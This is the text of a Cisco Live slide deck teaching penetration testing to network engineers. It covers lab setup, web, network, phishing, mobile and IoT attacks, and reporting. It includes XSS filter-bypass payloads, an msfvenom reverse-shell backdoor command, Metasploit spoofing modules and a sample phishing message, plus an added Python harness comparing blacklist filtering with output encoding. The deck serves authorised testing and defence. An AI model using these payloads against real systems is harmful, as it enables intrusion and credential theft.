Brksec 2013
Penetration Testing For Network Engineers
Know Yourself and Enemy, Need Not Fear 100 Battles
Joseph Muniz – Architect Americas
BRKSEC-2013
#CLMEL
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
Cat And Mouse Game
[Figure labels: Time; Computer; OS; Internet; Browser; Browser Plugins; IoT; Phishing; Powershell; Etc.]
The Evolution of Ransomware Variants
[Figure: timeline, 1989 to 2018, of ransomware variants, among them PC Cyborg, GPCoder, Reveton, Cryptolocker, Cryptowall, TeslaCrypt, Locky, Cerber, Petya, Jaff, WannaCry, NotPetya and SamSam, with milestones such as the Bitcoin network launch and crypto-mining.]
Ransomware Evolution
Threats Continue
Option 1: Hope You Are Secure
Option 2: Validate You Are Secure
Agenda
• Why Use Penetration Testing
• Penetration Testing Lab
• Testing Concepts
• Attacking Websites
• Attacking Networks
• Attacking People
• Attacking Mobile Devices
• Attacking IoT
• Reporting and Next Steps
• Conclusion
Yay For Giveaways!
Download The CTR Comic
https://tinyurl.com/ycwt2moz
https://tinyurl.com/y6uurzuu
Joseph Muniz Technical Security Architect
Security Architect – Americas Sales Organization
Twitter @SecureBlogger
Goals For Penetration Testing
Cybersecurity Goals
Persistence Level
Smash n Grab – Automated attacks against anything vulnerable.
Not targeted
Example: Exploit Kits or SPAM
Known and Unknown Threats
Known – Attack has been seen and characterised.
Develop signatures for detection
Behaviour triggers
Domains blocked
Antivirus / IPS leverage this
Vulnerabilities
• Weakness in system
• Configuration error, missing patch, design flaw, etc.
• Signature-based security defends against attacks (exploits) on vulnerabilities. Examples: IPS, Anti-Virus
Common Vulnerabilities and Exposures (CVE)
Common Vulnerability Scoring System
Consistent standard for computing vulnerability severity
The examples use version 2, which is the most used, but version 3 is the latest
Access Complexity High (H) = .035 Medium (M) = 0.61 Low (L) = 0.71
Integrity None (N) = 0.0 Partial (P) = 0.275 Complete (C) = 0.660
Availability None (N) = 0.0 Partial (P) = 0.275 Complete (C) = 0.660
Best of Breed vs Defence in Depth
[Figure: capability diagrams for the two approaches, joined by OR]
Malware
Joey’s Shoes
2.0
Vulnerability Management Current State
Recorded Threat
Anomaly Behaviour
Why Tuning Matters
Vendor Feeds
Security Operation Centre Services
• Risk Management – Dealing with any type of risk
• Vulnerability Management – Dealing with vulnerabilities
• Incident Response – Responding to attacks
• Audit – Checking for compliance
• Digital Forensics – Investigating breaches / legal needs
• Hacking – Unlocking features / creating new capabilities
Why First Perform a Vulnerability Assessment Before Pentest?
Assessment vs Penetration Test
Credential vs Non-Credential Scanning
Host Scan
Credential
• Less load on network
• Considered “Safer Scan”
• Better data
• Network scan
Credential
SANS - Vulnerability Management
• Triggers
• CVE Identifier may trigger event
• Assessment tools
• Audits
• NAC and Profiling can help with Asset Inventory
How to Prioritize Risk – COBIT 5 (ISACA)
Penetration Testing
Penetration Testing Starting Points
Statement of Work
Get out of Jail Card
• Authorisation in writing
• Signed by the right person
• State risks
• Assign liability to stakeholder
Hack Back Research
Search Youtube – Muniz DEFCON 26
May be illegal
• Use same tactics as attacker!!!
• What damage can you really do?
Building A Lab
Kali Linux (Also BackBox is good)
Open Source Penetration Testing Arsenal
Many Great Forensics Tools
Download
www.kali.org
Metasploit
Penetration testing tool used for executing exploit code against a remote target machine.
Defense Tools are Similar
Sandbox - Cuckoo
https://www.cuckoosandbox.org/
TrIDNET or PEiD
Honeypot
Clonezilla
Real malware analysis means bare metal testing
VMware
Vulnerability Scanners
http://sourceforge.net/projects/owaspbwa/files
Metasploitable 2
Simple Lab Example
[Figure: lab components: MAC OSX, VMware Fusion, Kali Linux, Windows 7, Kali USB option, 200 Gig mobile storage, Internet]
The Process
Attack Kill Chain
Many Targets to Consider
[Figure labels: HQ; Branch Network; Users; Cloud; Data Center; Admin; Roaming Users]
Vectors of an Attack
Physical | Digital
• Intel Gather
• Surveil | • Scan
• Pick | • Assess
• Force | • Exploit
• Conceal | • Persist
• Persist | • Propagate
| • Exfiltrate
Converged Attack
Converged attacks are most effective and most difficult to thwart
Social
• Targeted Phishing
• Conning Guards/Staff
• Impersonation
• Phone Phishing
• Create Spies
Physical Attacks
USB Script Options
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Lock Picking
Door Cards – Proxmark3
https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
Digital Attacks
NMAP shows Open Ports!
Nexpose shows vulnerabilities
Metasploit delivers attack
Social Attacks
Attacking Websites
Web Recon - Shodan.io
92% of Internet devices surveyed were running known vulnerabilities, average of 26 each
Web Reconnaissance
Interrogate DNS
Interrogate DNS (Inside)
Target Fingerprinting
• ICMP Port unreachable messages
• Banners
• Binaries
• Port Signatures
• Non-standard handshakes
• Response to synfloods
• Packets with non-standard TCP/IP Flags
Open Ports … Now What?
OWASP Top 10
OWASP ZAP
Bypass & Defeat XSS Filters
Mess with script
<script>alert(123)</script>
<script >alert(123)</script>
<script	>alert(123)</script>
<ScRipT>alert(123)</sCriPt>
<%00script>al%00ert(123)</script>
Pseudo-Protocols
<a href="https://www.google.com">Click Here</a>
Attributes and Tags
<input type="text" name="input" value="HI">
<input type="text" name="input" value="><script>alert(1)</script>
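Why a tag blacklist misses these variants while output encoding does not, as an added example that is not part of the original deck. `naive_filter` is a hypothetical filter written for this illustration; the inputs are the variants listed on the slide.

```python
import html
from html.parser import HTMLParser

# Variants copied from the slide, used here as constructed test inputs.
BODY_PAYLOADS = [
    "<script>alert(123)</script>",
    "<script >alert(123)</script>",
    "<script\t>alert(123)</script>",
    "<ScRipT>alert(123)</sCriPt>",
]
ATTR_PAYLOAD = '"><script>alert(1)</script>'


def naive_filter(value):
    """Hypothetical blacklist filter: removes only the exact lowercase tags."""
    return value.replace("<script>", "").replace("</script>", "")


def encode(value):
    """Output encoding: <, >, &, " and ' become character references."""
    return html.escape(value, quote=True)


class _Collector(HTMLParser):
    """Records every start tag and all text the HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.text = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)


def parse(markup):
    collector = _Collector()
    collector.feed(markup)
    collector.close()
    return collector.tags, "".join(collector.text)


def body_injected(value, sanitize):
    """True if input placed in element content produced a tag of its own."""
    tags, _ = parse(f"<p>{sanitize(value)}</p>")
    return tags != ["p"]


def attr_injected(value, sanitize):
    """True if input placed in a quoted attribute escaped that attribute."""
    markup = f'<input type="text" name="input" value="{sanitize(value)}">'
    tags, text = parse(markup)
    return tags != ["input"] or text != ""


def audit():
    """Rows of (input, gets past naive_filter, gets past encode)."""
    rows = [(p, body_injected(p, naive_filter), body_injected(p, encode))
            for p in BODY_PAYLOADS]
    rows.append((ATTR_PAYLOAD,
                 attr_injected(ATTR_PAYLOAD, naive_filter),
                 attr_injected(ATTR_PAYLOAD, encode)))
    return rows


if __name__ == "__main__":
    for payload, naive_hit, encoded_hit in audit():
        print(f"{payload!r:40} filter bypassed={naive_hit} encoding bypassed={encoded_hit}")
```

The blacklist stops only the exact lowercase tag; in the attribute case it strips the tag but the quote still closes the attribute, which is why encoding for the output context is the fix rather than a longer blacklist.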
XSSer
Summarising Web Testing
[Figure: three steps labelled One, Two, Three]
Attacking Networks
Plugging in Networks
Hacking SNMP
Attacking SNMP
Onesixtyone – Brute Force with text file
Viewing Network Data
Network MiTM
WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device
Defending
• VPN
• Disable Auto WiFi Connect
• WIDS/WIPS
• Remove HTTP from critical servers
How Easy is Getting Wireless MiTM?
WiFi Pineapple
• Wireless Pentesting Tool
• Can Spoof SSID and perform SSL-Strip
• Cost: $100 - $200 from Hak5
Raspberry Pi
• $35 computer
• Can host any OS including Kali Linux
• Kali Linux offers multiple penetration testing applications
Responder – LLMNR / NBT-NS / WPAD
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
auxiliary/server/capture/smb
Windows - ShareCheck
http://www.sec-1.com/blog/2014/sharecheck
Exfiltration
Attacking People
You can be anybody
Emily Williams
• Total Connections: 170 Employees, 71 Cisco; 22 NetApp; 10 EMC; 35 McAfee; 300+ Facebook friends
• Endorsements: 22 LinkedIn Endorsements, For Expertise and Experience; From Partners and co-workers
Speak Like Your Target
Phishing / Spear Phishing
Phishing Emails
Browser Injection Framework (BeEF)
• Hook victim browsers as beachheads for attacks
• Social engineer to click customized link
• Available attacks depend on current browser vulnerabilities
• Can track hooked systems
Social Engineering Tool Kit (SET)
• Easily clone a website
• Create various phishing attacks
• Create payload and listener
• Mailer attacks
• Powershell attacks
• And many many more ….
Business Email Compromise
Attacker john@ciscco.com: We have conference dues to pay that are late. Pay at www.hackme.com/dues
Cisco Financial bob1@cisco.com: Ok I’m on it!
Attacking Endpoints
Packing Malware 101
Bypass signature based detection
[Figure labels: Executable; Payload (unpacked malware); Changed less frequently]
Weaponize: RAT vs Dropper
Encoding – Create Backdoor
Metasploit
msfvenom -p python/meterpreter/reverse-underscore-tcp LHOST = ANYIP
LPORT= ANY PORT R> anyname.py
Senna
Testing Encoding
• Metasploit has encoders but they are detected
• Shellter
• Veil Framework
• Building custom Python or PowerShell connectors
Testing RATs
Metasploit Framework for Undetectable Malware
PowerShell Empire
Example: Phishing Phishers (Magic land)
Step 2: Act stupid - Talk about the matrix and blackhat movie
Privilege Escalation
Password Cracking Concepts
• BIOS – Try manufacturer password
• Guessing or Recovering a password
(admin | password | cisco | blank | vendor name)
• Dictionary / Rainbow Tables
• Man-in-the-middle
• Attacking encryption
Lots of Password Cracking Tools
• Hashcat - Hash cracking tool
• RainbowCrack - Hash cracker tool, Windows/Linux based
• Wfuzz - Web application brute forcing (GET / POST), (SQL, XSS, LDAP, etc.)
• Cain and Abel - Few features of password cracking ability
• John the Ripper - Offline mode, auto hash password type detector
• THC Hydra - Dictionary attack tool for many databases, over 30 protocols
• AirCrack-NG - WEP and WPA-PSK keys cracking
• OphCrack / Medusa / L0phtCrack / Etc.
CeWL
Attacking Mobile Devices
Always Research
Phones: MAC OSX
• iOS Snapshots
Phones: Android
Example Reading SMS
+---------------------+---------------------+--------+--------------------------------------------------------------+
| date                | date_sent           | person | body                                                         |
|---------------------+---------------------+--------+--------------------------------------------------------------|
| 2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54     | Hello Randy! Where should I send my Cisco live presentation? |
| 2017-10-20 16:34:03 | 2017-01-01 02:00:00 |        | Damn, thanks ! for texting jet                               |
| 2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54     | Jet? When you are a Jet, you’re a jet? West Side??           |
| Stupid auto correct! | I’m going to dropkick you Joey ... And this phone
What is Root for Android?
[Figure: Android file system. Root directory, System, Data: "Requires root access to modify". SD CARD, Downloads, Pictures: "Accessible by default".]
Models You Won’t Root
Google Pixel or Pixel XL (Verizon variant)
Google Pixel 2 or Pixel 2 XL (Verizon variant)
Samsung Galaxy S7 (US variants)
Samsung Galaxy S7 Edge (US variants)
Samsung Galaxy S8 (US variants)
Samsung Galaxy S8+ (US variants)
Samsung Galaxy Note 8 (US variants)
Samsung Galaxy S9 (US variants)
Samsung Galaxy S9+ (US variants)
Samsung Galaxy Note 9 (US variants)
Good Targets
Google Nexus 6P
OnePlus 3 or 3T
OnePlus 5
OnePlus 6
Google Nexus 7 (2012 or 2013)
Google Pixel or Pixel XL
Google Pixel 2 or Pixel 2XL
Brute Force PINs
Many Commercial Tools Available
Accessing Unauthorized Voicemail
Testing IoT
Hacking IoT
Lightbulbs
Conference Blinky Things
IoT Recon
IoT Firmware
IoT Hardware Hacking
Radio Interfaces
Reporting
Language is Everything
Penetration Testing Report
Penetration Testing Report - Details
Vulnerabilities – What you found
Impact – Potential damage
Likelihood – How hard to execute
Risk evaluation – Impact to business
Recommendation – Remediation steps
References – Who worked on what
Additional details – Appendices, Glossary, Tools used, etc.
Remember …. Cybersecurity Goals
•Wrap up
Threats will increase.
Volume and sophistication.
Next Steps
Security is a Journey, Not a destination
Q&A
Thank you